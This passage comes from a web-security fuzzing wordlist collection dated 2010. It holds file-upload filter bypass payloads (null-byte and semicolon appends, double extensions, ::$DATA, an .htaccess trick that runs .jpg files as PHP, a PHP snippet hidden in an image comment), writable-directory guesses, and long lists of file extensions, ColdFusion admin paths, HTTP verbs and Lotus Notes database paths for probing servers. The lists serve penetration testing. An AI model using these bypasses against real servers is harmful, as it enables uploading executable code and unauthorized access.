# example .htaccess that sets mime type .jpg to be executable:<br />
# -----<br />
# AddType application/x-httpd-php .jpg<br />
# -----<br />
</pre><br />
<br />
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2) ===<br />
<pre># Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2010<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) ===<br />
<pre># PHP-Specific File Upload Filter Bypass Appends (Update: 17 March 2010 - notes<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# also: use "gim" to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar<br />
{PHPSCRIPT}.php.doc<br />
{PHPSCRIPT}.php.xls<br />
{PHPSCRIPT}.php.xlsx<br />
{PHPSCRIPT}.php.pdf<br />
{PHPSCRIPT}.php.jpeg<br />
{PHPSCRIPT}.php.gif<br />
{PHPSCRIPT}.php.zip<br />
</pre><br />
<br />
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14) ===<br />
<pre># Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2009<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{ASPSCRIPT}<br />
{ASPSCRIPT};<br />
{ASPSCRIPT};.jpg<br />
{ASPSCRIPT};.pdf<br />
{ASPSCRIPT};.html<br />
{ASPSCRIPT};.htm<br />
{ASPSCRIPT};.txt<br />
{ASPSCRIPT};.xyz<br />
{ASPSCRIPT};.zip<br />
{ASPSCRIPT};.tgz<br />
{ASPSCRIPT};.doc<br />
{ASPSCRIPT};.docx<br />
{ASPSCRIPT};.xls<br />
{ASPSCRIPT};.xlsx<br />
</pre><br />
<br />
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9) ===<br />
<pre>#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010) <br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{HOST}/templates_compiled/<br />
{HOST}/templates_c/<br />
{HOST}/templates/<br />
{HOST}/temporary/<br />
{HOST}/images/<br />
{HOST}/cache/<br />
{HOST}/temp/<br />
{HOST}/files/<br />
{HOST}/tmp/<br />
</pre><br />
<br />
=== Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863) ===<br />
<pre><br />
#Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
<pre><br />
.$er<br />
.123<br />
.1pe<br />
.1ph<br />
.3dr<br />
.3dt<br />
.3me<br />
.3pe<br />
.4dl<br />
.4dv<br />
.8xk<br />
.^^^<br />
.a3l<br />
.a3m<br />
.a3w<br />
.a4l<br />
.a4m<br />
.a4w<br />
.a5l<br />
.a5w<br />
.a65<br />
.aao<br />
.ab<br />
.ab1<br />
.ab2<br />
.ab3<br />
.abcd<br />
.abi<br />
.abp<br />
.aby<br />
.aca<br />
.acc<br />
.accdb<br />
.acf<br />
.acg<br />
.ade<br />
.adp<br />
.adt<br />
.adx<br />
.aft<br />
.agd<br />
.aifb<br />
.alc<br />
.ald<br />
.ali<br />
.amb<br />
.amsorm<br />
.an1<br />
.anme<br />
.apr<br />
.arc<br />
.arh<br />
.ask<br />
.asm<br />
.ast<br />
.at5<br />
.att<br />
.aw<br />
.awg<br />
.azw<br />
.bafl<br />
.bci<br />
.bcm<br />
.bdf<br />
.bdic<br />
.bfx<br />
.bgl<br />
.bgt<br />
.bin<br />
.bjo<br />
.bk<br />
.bkk<br />
.blb<br />
.bld<br />
.blg<br />
.bok<br />
.box<br />
.brd<br />
.brw<br />
.btf<br />
.btif<br />
.btm<br />
.btr<br />
.cap<br />
.cat<br />
.cbg<br />
.cch<br />
.ccr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.cdx<br />
.cel<br />
.celtx<br />
.chg<br />
.chk<br />
.chn<br />
.ckd<br />
.ckt<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.clp<br />
.cmbl<br />
.cna<br />
.contact<br />
.cpi<br />
.cpmz<br />
.crd<br />
.crtx<br />
.csa<br />
.csv<br />
.ctf<br />
.ctt<br />
.cursorfx<br />
.curxptheme<br />
.cvd<br />
.cvn<br />
.cwk<br />
.cws<br />
.cwz<br />
.cxt<br />
.cyo<br />
.cys<br />
.daf<br />
.dal<br />
.dam<br />
.das<br />
.dat<br />
.data<br />
.db<br />
.db2<br />
.db3<br />
.dbc<br />
.dbd<br />
.dbf<br />
.dbx<br />
.dcf<br />
.dcl<br />
.dcm<br />
.dcmd<br />
.ddc<br />
.ddcx<br />
.ddt<br />
.dem<br />
.des<br />
.dex<br />
.dfm<br />
.dfproj<br />
.dft<br />
.dgb<br />
.dif<br />
.dii<br />
.dlg<br />
.dm2<br />
.dmo<br />
.dmsk<br />
.dnc<br />
.dockzip<br />
.dp1<br />
.dpn<br />
.dpx<br />
.drl<br />
.dsb<br />
.dsd<br />
.dsk<br />
.dsy<br />
.dsz<br />
.dt0<br />
.dt1<br />
.dt2<br />
.dta<br />
.dtr<br />
.dvdproj<br />
.dvo<br />
.dwi<br />
.e00<br />
.eap<br />
.ebuild<br />
.ec0<br />
.eco<br />
.ecx<br />
.edb<br />
.edf<br />
.eep<br />
.efx<br />
.egp<br />
.emb<br />
.emd<br />
.emlxpart<br />
.enc<br />
.enw<br />
.epp<br />
.epub<br />
.epw<br />
.er1<br />
.esp<br />
.ess<br />
.est<br />
.esx<br />
.et<br />
.eta<br />
.etd<br />
.etl<br />
.ev<br />
.ev3<br />
.evt<br />
.evy<br />
.exif<br />
.exp<br />
.exx<br />
.fa<br />
.fasta<br />
.fbl<br />
.fcd<br />
.fcs<br />
.fdb<br />
.ffd<br />
.ffwp<br />
.fhc<br />
.fid<br />
.fil<br />
.flame<br />
.fll<br />
.flo<br />
.flp<br />
.flt<br />
.fm<br />
.fm5<br />
.fmp<br />
.fo<br />
.fob<br />
.fol<br />
.fop<br />
.fox<br />
.fp<br />
.fp3<br />
.fp4<br />
.fp5<br />
.fp7<br />
.frl<br />
.frm<br />
.fro<br />
.frx<br />
.fsb<br />
.fsc<br />
.ftm<br />
.ftw<br />
.gan<br />
.gbr<br />
.gc<br />
.gcx<br />
.gdb<br />
.ged<br />
.gedcom<br />
.gen<br />
.ggb<br />
.gml<br />
.gms<br />
.gno<br />
.gnp<br />
.gp3<br />
.gpi<br />
.gps<br />
.gpx<br />
.gra<br />
.grade<br />
.grf<br />
.grib<br />
.grk<br />
.grr<br />
.grv<br />
.gs<br />
.gst<br />
.gtp<br />
.gwk<br />
.gxl<br />
.hcc<br />
.hce<br />
.hci<br />
.hcp<br />
.hcr<br />
.hcu<br />
.hda<br />
.hdb<br />
.hdf<br />
.hdi<br />
.hdl<br />
.hif<br />
.hl<br />
.hml<br />
.hmt<br />
.hs2<br />
.hsk<br />
.hst<br />
.htg<br />
.huh<br />
.hyv<br />
.i5z<br />
.ib<br />
.ics<br />
.id2<br />
.idx<br />
.igc<br />
.ihx<br />
.ii<br />
.iif<br />
.img<br />
.imt<br />
.ink<br />
.inp<br />
.ins<br />
.ip<br />
.irock<br />
.irr<br />
.irx<br />
.isf<br />
.itdb<br />
.itl<br />
.itm<br />
.itn<br />
.itw<br />
.itx<br />
.ivt<br />
.iw<br />
.ixb<br />
.jasper<br />
.jdb<br />
.jef<br />
.jmp<br />
.jnt<br />
.job<br />
.joboptions<br />
.joined<br />
.jph<br />
.jrprint<br />
.jrxml<br />
.jude<br />
.kap<br />
.kdb<br />
.kid<br />
.kismac<br />
.kmz<br />
.kpf<br />
.kpp<br />
.kpr<br />
.kpx<br />
.kpz<br />
.l<br />
.l6t<br />
.laccdb<br />
.lbl<br />
.lbx<br />
.lcd<br />
.lcf<br />
.lcm<br />
.ldif<br />
.lex<br />
.lgc<br />
.lgf<br />
.lgh<br />
.lgi<br />
.lgl<br />
.lib<br />
.lif<br />
.livereg<br />
.liveupdate<br />
.lix<br />
.llb<br />
.lms<br />
.lmx<br />
.lnt<br />
.loc<br />
.lp7<br />
.lrf<br />
.lrs<br />
.lrx<br />
.lsf<br />
.lsl<br />
.lsp<br />
.lsr<br />
.lst<br />
.lsu<br />
.lvm<br />
.lw4<br />
.ly<br />
.m<br />
.mag<br />
.mai<br />
.map<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mbf<br />
.mbg<br />
.mbl<br />
.mbp<br />
.mbx<br />
.mc1<br />
.mc9<br />
.mcd<br />
.md<br />
.mdb<br />
.mdc<br />
.mdf<br />
.mdl<br />
.mdm<br />
.mdn<br />
.mdt<br />
.mdx<br />
.mdz<br />
.mem<br />
.menc<br />
.met<br />
.mex<br />
.mfo<br />
.mfp<br />
.mgc<br />
.mls<br />
.mm<br />
.mmap<br />
.mmc<br />
.mmf<br />
.mmp<br />
.mnc<br />
.mng<br />
.mnk<br />
.mno<br />
.mny<br />
.mobi<br />
.moho<br />
.mosaic<br />
.mox<br />
.mpd<br />
.mpj<br />
.mpp<br />
.mpt<br />
.mpx<br />
.mpz<br />
.mq4<br />
.ms10<br />
.mth<br />
.mtw<br />
.mud<br />
.muf<br />
.mw<br />
.mwf<br />
.mws<br />
.mwx<br />
.mxd<br />
.myd<br />
.myi<br />
.nb<br />
.nc<br />
.ndf<br />
.ndk<br />
.ndx<br />
.net<br />
.neta<br />
.nfo<br />
.nitf<br />
.nmind<br />
.not<br />
.notebook<br />
.np<br />
.npl<br />
.npt<br />
.nrl<br />
.ns2<br />
.ns3<br />
.ns4<br />
.nsf<br />
.ntx<br />
.numbers<br />
.nvl<br />
.nyf<br />
.oab<br />
.obj<br />
.odb<br />
.odf<br />
.odp<br />
.ods<br />
.odx<br />
.oeaccount<br />
.ofc<br />
.ofm<br />
.oft<br />
.ofx<br />
.omcs<br />
.omp<br />
.ond<br />
.one<br />
.oo3<br />
.opf<br />
.opx<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.or6<br />
.org<br />
.orx<br />
.otf<br />
.otl<br />
.otln<br />
.ots<br />
.out<br />
.ov2<br />
.ova<br />
.ovf<br />
.p96<br />
.p97<br />
.pab<br />
.paf<br />
.pan<br />
.pbd<br />
.pc<br />
.pcap<br />
.pcb<br />
.pcr<br />
.pd4<br />
.pd5<br />
.pdas<br />
.pdb<br />
.pdd<br />
.pdm<br />
.pds<br />
.pdx<br />
.peb<br />
.pec<br />
.pep<br />
.pex<br />
.pfc<br />
.pfl<br />
.phb<br />
.phm<br />
.pi<br />
.pis<br />
.pjx<br />
.pka<br />
.pkb<br />
.pkh<br />
.pks<br />
.pkt<br />
.pln<br />
.plw<br />
.pmo<br />
.pmr<br />
.pnproj<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pod<br />
.poi<br />
.pos<br />
.postal<br />
.pot<br />
.potm<br />
.potx<br />
.pp2<br />
.ppf<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.prc<br />
.pre<br />
.prf<br />
.prj<br />
.prm<br />
.prs<br />
.psa<br />
.psf<br />
.psm<br />
.pst<br />
.ptb<br />
.ptf<br />
.ptk<br />
.ptm<br />
.ptn<br />
.ptt<br />
.ptz<br />
.pvl<br />
.pwd<br />
.pxj<br />
.pxl<br />
.q07<br />
.q08<br />
.q09<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qdfm<br />
.qel<br />
.qfx<br />
.qif<br />
.qpb<br />
.qpf<br />
.qph<br />
.qpm<br />
.qpw<br />
.qrp<br />
.qsd<br />
.ral<br />
.rbt<br />
.rcd<br />
.rcg<br />
.rdb<br />
.rdf<br />
.rdx<br />
.ref<br />
.ret<br />
.rf1<br />
.rfa<br />
.rfo<br />
.rge<br />
.rgn<br />
.rgo<br />
.rmuf<br />
.rnq<br />
.rod<br />
.rog<br />
.roi<br />
.rou<br />
.rpp<br />
.rpt<br />
.rrt<br />
.rsc<br />
.rsd<br />
.rsw<br />
.rte<br />
.rvt<br />
.rwg<br />
.rzb<br />
.s85<br />
.saf<br />
.sam07<br />
.sar<br />
.sav<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sca<br />
.scf<br />
.sch<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sdp<br />
.sdq<br />
.sds<br />
.sen<br />
.seo<br />
.seq<br />
.ser<br />
.sgml<br />
.sgn<br />
.shp<br />
.shs<br />
.shx<br />
.skc<br />
.skv<br />
.skx<br />
.sle<br />
.slk<br />
.slp<br />
.snapfireshow<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sps<br />
.spub<br />
.spv<br />
.sq<br />
.sqd<br />
.sql<br />
.sqlite<br />
.sqr<br />
.sta<br />
.stc<br />
.stf<br />
.stk<br />
.stl<br />
.stm<br />
.stp<br />
.str<br />
.stt<br />
.stw<br />
.styk<br />
.stykz<br />
.swk<br />
.sxc<br />
.sxi<br />
.sy3<br />
.t01<br />
.t02<br />
.t03<br />
.t04<br />
.t05<br />
.t06<br />
.t07<br />
.t08<br />
.t09<br />
.t2<br />
.t3001<br />
.tax2008<br />
.tax2009<br />
.tb<br />
.tbk<br />
.tbl<br />
.tcc<br />
.tcx<br />
.tda<br />
.tdl<br />
.tdm<br />
.tdt<br />
.te<br />
.te3<br />
.teacher<br />
.tef<br />
.tet<br />
.tfa<br />
.tfd<br />
.tfrd<br />
.tjp<br />
.tk3<br />
.tkfl<br />
.tmw<br />
.tol<br />
.topc<br />
.tpb<br />
.tps<br />
.tr3<br />
.tra<br />
.trd<br />
.trk<br />
.trs<br />
.trx<br />
.tst<br />
.tsv<br />
.ttk<br />
.txa<br />
.txd<br />
.txf<br />
.uccapilog<br />
.ud<br />
.udb<br />
.udeb<br />
.uds<br />
.ulf<br />
.ulz<br />
.update<br />
.upoi<br />
.usr<br />
.uvf<br />
.uwl<br />
.val<br />
.vbpf1<br />
.vcd<br />
.vce<br />
.vcf<br />
.vcs<br />
.vdb<br />
.vdx<br />
.vfs<br />
.vi<br />
.vip<br />
.vle<br />
.vlg<br />
.vmt<br />
.voi<br />
.vok<br />
.vrd<br />
.vscontent<br />
.vsx<br />
.vtx<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb2<br />
.wb3<br />
.wdb<br />
.wdq<br />
.wea<br />
.wfd<br />
.wfm<br />
.wgp<br />
.wgt<br />
.windowslivecontact<br />
.wjr<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wki<br />
.wks<br />
.wku<br />
.wlmp<br />
.wmdb<br />
.wor<br />
.wpc<br />
.wpf<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtb<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xdp<br />
.xds<br />
.xef<br />
.xem<br />
.xfd<br />
.xfo<br />
.xft<br />
.xl<br />
.xlc<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsb<br />
.xlsm<br />
.xlsx<br />
.xlt<br />
.xltm<br />
.xltx<br />
.xlw<br />
.xmcd<br />
.xml<br />
.xmlper<br />
.xmpz<br />
.xpg<br />
.xpj<br />
.xpm<br />
.xpt<br />
.xrp<br />
.xsl<br />
.xslt<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.yam<br />
.zap<br />
.zdb<br />
.zdc<br />
.zix<br />
.zmc<br />
.zpl<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===<br />
<pre><br />
# Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.0<br />
.000<br />
.7z<br />
.a00<br />
.a01<br />
.a02<br />
.ace<br />
.ain<br />
.alz<br />
.apz<br />
.ar<br />
.arc<br />
.arh<br />
.ari<br />
.arj<br />
.ark<br />
.axx<br />
.b64<br />
.ba<br />
.bh<br />
.boo<br />
.bz<br />
.bz2<br />
.bzip<br />
.bzip2<br />
.c00<br />
.c01<br />
.c02<br />
.car<br />
.cb7<br />
.cbr<br />
.cbt<br />
.cbz<br />
.cp9<br />
.cpgz<br />
.cpt<br />
.dar<br />
.dd<br />
.deb<br />
.dgc<br />
.dist<br />
.ecs<br />
.efw<br />
.epi<br />
.f<br />
.fdp<br />
.gca<br />
.gz<br />
.gzi<br />
.gzip<br />
.ha<br />
.hbc<br />
.hbc2<br />
.hbe<br />
.hki<br />
.hki1<br />
.hki2<br />
.hki3<br />
.hpk<br />
.hyp<br />
.ice<br />
.ipg<br />
.ipk<br />
.ish<br />
.j<br />
.jar.pack<br />
.jgz<br />
.jic<br />
.kgb<br />
.lbr<br />
.lemon<br />
.lha<br />
.lnx<br />
.lqr<br />
.lz<br />
.lzh<br />
.lzm<br />
.lzma<br />
.lzo<br />
.lzx<br />
.md<br />
.mint<br />
.mou<br />
.mpkg<br />
.mzp<br />
.oar<br />
.p7m<br />
.pack.gz<br />
.package<br />
.pae<br />
.pak<br />
.paq6<br />
.paq7<br />
.paq8<br />
.par<br />
.par2<br />
.pbi<br />
.pcv<br />
.pea<br />
.pet<br />
.pf<br />
.pim<br />
.pit<br />
.piz<br />
.pkg<br />
.pup<br />
.puz<br />
.pwa<br />
.qda<br />
.r0<br />
.r00<br />
.r01<br />
.r02<br />
.r03<br />
.r1<br />
.r2<br />
.r30<br />
.rar<br />
.rev<br />
.rk<br />
.rnc<br />
.rp9<br />
.rpm<br />
.rte<br />
.rz<br />
.rzs<br />
.s00<br />
.s01<br />
.s02<br />
.s7z<br />
.sar<br />
.sdc<br />
.sdn<br />
.sea<br />
.sen<br />
.sfs<br />
.sfx<br />
.sh<br />
.shar<br />
.shk<br />
.shr<br />
.sit<br />
.sitx<br />
.spt<br />
.sqx<br />
.sqz<br />
.tar<br />
.tar.gz<br />
.tar.xz<br />
.taz<br />
.tbz<br />
.tbz2<br />
.tg<br />
.tgz<br />
.tlz<br />
.tlzma<br />
.txz<br />
.tz<br />
.uc2<br />
.uha<br />
.vem<br />
.vsi<br />
.wad<br />
.war<br />
.wot<br />
.xef<br />
.xez<br />
.xmcdz<br />
.xpi<br />
.xx<br />
.xz<br />
.y<br />
.yz<br />
.z<br />
.z01<br />
.z02<br />
.z03<br />
.z04<br />
.zap<br />
.zfsendtotarget<br />
.zip<br />
.zipx<br />
.zix<br />
.zoo<br />
.zpi<br />
.zz</pre><br />
<br />
=== Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) ===<br />
<pre><br />
# Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.3me<br />
.3pe<br />
.4dl<br />
.8xk<br />
.^^^<br />
.aao<br />
.ab2<br />
.aca<br />
.accdb<br />
.acf<br />
.acg<br />
.agd<br />
.an1<br />
.anme<br />
.arc<br />
.arh<br />
.ast<br />
.att<br />
.aw<br />
.bafl<br />
.bdf<br />
.bfx<br />
.bjo<br />
.bld<br />
.blg<br />
.btf<br />
.btif<br />
.btr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.chk<br />
.ckd<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.cmbl<br />
.contact<br />
.cpi<br />
.cpmz<br />
.csv<br />
.cwz<br />
.cxt<br />
.daf<br />
.dat<br />
.data<br />
.db<br />
.dcf<br />
.ddt<br />
.dex<br />
.dif<br />
.dmsk<br />
.dnc<br />
.dpx<br />
.dsd<br />
.dt1<br />
.dt2<br />
.dta<br />
.e00<br />
.ec0<br />
.edf<br />
.eep<br />
.efx<br />
.enc<br />
.enw<br />
.epw<br />
.est<br />
.et<br />
.eta<br />
.ev3<br />
.exif<br />
.exp<br />
.fbl<br />
.fdb<br />
.fid<br />
.fol<br />
.gdb<br />
.gen<br />
.gnp<br />
.gpi<br />
.gpx<br />
.hcp<br />
.hdf<br />
.hmt<br />
.hsk<br />
.htg<br />
.id2<br />
.ii<br />
.img<br />
.ink<br />
.ins<br />
.irr<br />
.irx<br />
.iw<br />
.jdb<br />
.jnt<br />
.job<br />
.jrprint<br />
.kmz<br />
.lbx<br />
.lex<br />
.lgf<br />
.lgl<br />
.lib<br />
.liveupdate<br />
.lnt<br />
.lst<br />
.m<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mdb<br />
.mem<br />
.menc<br />
.met<br />
.mmf<br />
.mng<br />
.mpd<br />
.mpp<br />
.ms10<br />
.muf<br />
.mw<br />
.mwf<br />
.mwx<br />
.nc<br />
.ndx<br />
.nfo<br />
.not<br />
.ns2<br />
.ns3<br />
.ns4<br />
.ntx<br />
.numbers<br />
.ods<br />
.oeaccount<br />
.omcs<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.orx<br />
.out<br />
.ov2<br />
.ovf<br />
.paf<br />
.pbd<br />
.pcr<br />
.pdb<br />
.pdx<br />
.peb<br />
.pec<br />
.pfc<br />
.pis<br />
.pln<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pos<br />
.postal<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.pre<br />
.prf<br />
.psa<br />
.psf<br />
.pst<br />
.ptz<br />
.q07<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qfx<br />
.qpf<br />
.qpw<br />
.qsd<br />
.rcd<br />
.rdx<br />
.ref<br />
.rmuf<br />
.roi<br />
.rrt<br />
.rvt<br />
.rwg<br />
.saf<br />
.sam07<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sds<br />
.ser<br />
.sgn<br />
.shs<br />
.skc<br />
.slk<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sql<br />
.stf<br />
.stl<br />
.stm<br />
.sy3<br />
.t08<br />
.t09<br />
.t2<br />
.tax2009<br />
.tdl<br />
.tdt<br />
.te<br />
.teacher<br />
.tmw<br />
.tol<br />
.trk<br />
.trs<br />
.trx<br />
.tsv<br />
.uccapilog<br />
.ud<br />
.udeb<br />
.uds<br />
.update<br />
.uwl<br />
.val<br />
.vcf<br />
.vdb<br />
.vfs<br />
.vip<br />
.vle<br />
.vlg<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb3<br />
.wdq<br />
.wfd<br />
.wfm<br />
.windowslivecontact<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wks<br />
.wlmp<br />
.wpc<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xds<br />
.xfd<br />
.xl<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsx<br />
.xltm<br />
.xltx<br />
.xml<br />
.xmpz<br />
.xsl<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===<br />
<pre><br />
# Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
CFIDE/Administrator/<br />
CFIDE/Administrator/index.cfm<br />
CFIDE/Administrator/login.cfm<br />
CFIDE/Administrator/Application.cfm<br />
CFIDE/Application.cfm<br />
CFIDE/adminapi/<br />
CFIDE/adminapi/Application.cfm<br />
CFIDE/adminapi/administrator.cfc<br />
CFIDE/adminapi/base.cfc<br />
CFIDE/adminapi/customtags/<br />
CFIDE/adminapi/customtags/l10n.cfm<br />
CFIDE/adminapi/customtags/resources<br />
CFIDE/adminapi/customtags/resources/<br />
CFIDE/adminapi/datasource.cfc<br />
CFIDE/adminapi/debugging.cfc<br />
CFIDE/adminapi/eventgateway.cfc<br />
CFIDE/adminapi/extensions.cfc<br />
CFIDE/adminapi/mail.cfc<br />
CFIDE/adminapi/runtime.cfc<br />
CFIDE/adminapi/security.cfc<br />
CFIDE/adminapi/_datasource/<br />
CFIDE/adminapi/_datasource/formatjdbcurl.cfm<br />
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm<br />
CFIDE/adminapi/_datasource/geturldefaults.cfm<br />
CFIDE/adminapi/_datasource/setdsn.cfm<br />
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm<br />
CFIDE/adminapi/_datasource/setsldatasource.cfm<br />
CFIDE/classes/<br />
CFIDE/classes/cf-j2re-win.cab<br />
CFIDE/classes/cfapplets.jar<br />
CFIDE/classes/images<br />
CFIDE/componentutils/<br />
CFIDE/componentutils/Application.cfm<br />
CFIDE/componentutils/cfcexplorer.cfc<br />
CFIDE/componentutils/cfcexplorer_utils.cfm<br />
CFIDE/componentutils/componentdetail.cfm<br />
CFIDE/componentutils/componentdoc.cfm<br />
CFIDE/componentutils/componentlist.cfm<br />
CFIDE/componentutils/gatewaymenu<br />
CFIDE/componentutils/gatewaymenu/<br />
CFIDE/componentutils/gatewaymenu/menu.cfc<br />
CFIDE/componentutils/gatewaymenu/menunode.cfc<br />
CFIDE/componentutils/login.cfm<br />
CFIDE/componentutils/packagelist.cfm<br />
CFIDE/componentutils/utils.cfc<br />
CFIDE/componentutils/_component_cfcToHTML.cfm<br />
CFIDE/componentutils/_component_cfcToMCDL.cfm?<br />
CFIDE/componentutils/_component_style.cfm<br />
CFIDE/componentutils/_component_utils.cfm<br />
CFIDE/debug/<br />
CFIDE/debug/images/<br />
CFIDE/debug/includes/<br />
CFIDE/images/<br />
CFIDE/images/skins/<br />
CFIDE/install.cfm<br />
CFIDE/installers/<br />
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp<br />
CFIDE/installers/CFReportBuilderInstaller.exe<br />
CFIDE/probe.cfm<br />
CFIDE/scripts/<br />
CFIDE/scripts/css/<br />
CFIDE/scripts/xsl/<br />
CFIDE/wizards/<br />
CFIDE/wizards/common/<br />
CFIDE/wizards/common/utils.cfc</pre><br />
<br />
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31) ===<br />
<pre><br />
# ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
OPTIONS<br />
GET<br />
HEAD<br />
POST<br />
PUT<br />
DELETE<br />
TRACE<br />
CONNECT<br />
PROPFIND<br />
PROPPATCH<br />
MKCOL<br />
COPY<br />
MOVE<br />
LOCK<br />
UNLOCK<br />
VERSION-CONTROL<br />
REPORT<br />
CHECKOUT<br />
CHECKIN<br />
UNCHECKOUT<br />
MKWORKSPACE<br />
UPDATE<br />
LABEL<br />
MERGE<br />
BASELINE-CONTROL<br />
MKACTIVITY<br />
ORDERPATCH<br />
ACL<br />
PATCH<br />
SEARCH<br />
ARBITRARY<br />
</pre><br />
<br />
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111) ===<br />
<pre>/852566C90012664F<br />
/admin4.nsf<br />
/admin5.nsf<br />
/admin.nsf<br />
/agentrunner.nsf<br />
/alog.nsf<br />
/a_domlog.nsf<br />
/bookmark.nsf<br />
/busytime.nsf<br />
/catalog.nsf<br />
/certa.nsf<br />
/certlog.nsf<br />
/certsrv.nsf<br />
/chatlog.nsf<br />
/clbusy.nsf<br />
/cldbdir.nsf<br />
/clusta4.nsf<br />
/collect4.nsf<br />
/da.nsf<br />
/dba4.nsf<br />
/dclf.nsf<br />
/DEASAppDesign.nsf<br />
/DEASLog01.nsf<br />
/DEASLog02.nsf<br />
/DEASLog03.nsf<br />
/DEASLog04.nsf<br />
/DEASLog05.nsf<br />
/DEASLog.nsf<br />
/decsadm.nsf<br />
/decslog.nsf<br />
/DEESAdmin.nsf<br />
/dirassist.nsf<br />
/doladmin.nsf<br />
/domadmin.nsf<br />
/domcfg.nsf<br />
/domguide.nsf<br />
/domlog.nsf<br />
/dspug.nsf<br />
/events4.nsf<br />
/events5.nsf<br />
/events.nsf<br />
/event.nsf<br />
/homepage.nsf<br />
/iNotes/Forms5.nsf/$DefaultNav<br />
/jotter.nsf<br />
/leiadm.nsf<br />
/leilog.nsf<br />
/leivlt.nsf<br />
/log4a.nsf<br />
/log.nsf<br />
/l_domlog.nsf<br />
/mab.nsf<br />
/mail10.box<br />
/mail1.box<br />
/mail2.box<br />
/mail3.box<br />
/mail4.box<br />
/mail5.box<br />
/mail6.box<br />
/mail7.box<br />
/mail8.box<br />
/mail9.box<br />
/mail.box<br />
/msdwda.nsf<br />
/mtatbls.nsf<br />
/mtstore.nsf<br />
/names.nsf<br />
/nntppost.nsf<br />
/nntp/nd000001.nsf<br />
/nntp/nd000002.nsf<br />
/nntp/nd000003.nsf<br />
/ntsync45.nsf<br />
/perweb.nsf<br />
/qpadmin.nsf<br />
/quickplace/quickplace/main.nsf<br />
/reports.nsf<br />
/sample/siregw46.nsf<br />
/schema50.nsf<br />
/setupweb.nsf<br />
/setup.nsf<br />
/smbcfg.nsf<br />
/smconf.nsf<br />
/smency.nsf<br />
/smhelp.nsf<br />
/smmsg.nsf<br />
/smquar.nsf<br />
/smsolar.nsf<br />
